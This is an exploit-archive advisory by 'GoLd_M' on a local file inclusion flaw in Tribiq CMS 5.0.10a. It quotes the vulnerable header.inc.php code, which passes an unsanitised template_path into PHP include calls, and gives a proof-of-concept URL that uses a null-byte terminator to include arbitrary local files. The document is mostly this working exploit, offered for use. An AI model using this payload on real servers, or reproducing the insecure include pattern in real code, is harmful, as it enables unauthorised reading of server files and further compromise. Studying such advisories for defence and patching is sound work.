[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tribiq CMS 5.0.10a Local File Inclusion Vulnerability (win)
# Published : 2008-10-31
# Author : GoLd_M
# Previous Title : Cybershade CMS 0.2b Remote File Inclusion Vulnerability
# Next Title : Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ / / / / ___| / ___| / ___|
| | | |_) | V / / _ | | _ | | | |
| | | _ < | | / ___ | |_| | _ | |___ | |___
|_| |_| _ |_| /_/ _ ____| (_) ____| ____|
Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability
Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php
<div id="header">
<div id="logo"> <img src="templates/<?php echo $template_path;?>/images/logo.gif" alt="Company Name" /> </div>
<div id="language_selector">
<?php include "templates/".$template_path."/includes/language_box.inc.php";?> <--x
</div>
<div id="search_box">
<div id="searchbox_holder">
<?php include "templates/".$template_path."/includes/searchbox.inc.php";?><--x
</div>
</div>
</div>
POC :
/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00
____ _ _ __ __
/ ___| ___ | | __| | | / |
| | _ / _ | | / _` | | |/| |
| |_| | | (_) | | |___ | (_| | | | | |
____| ___/ |_____| __,_| _____ |_| |_|
|_____|
# www.Syue.com [2008-10-31]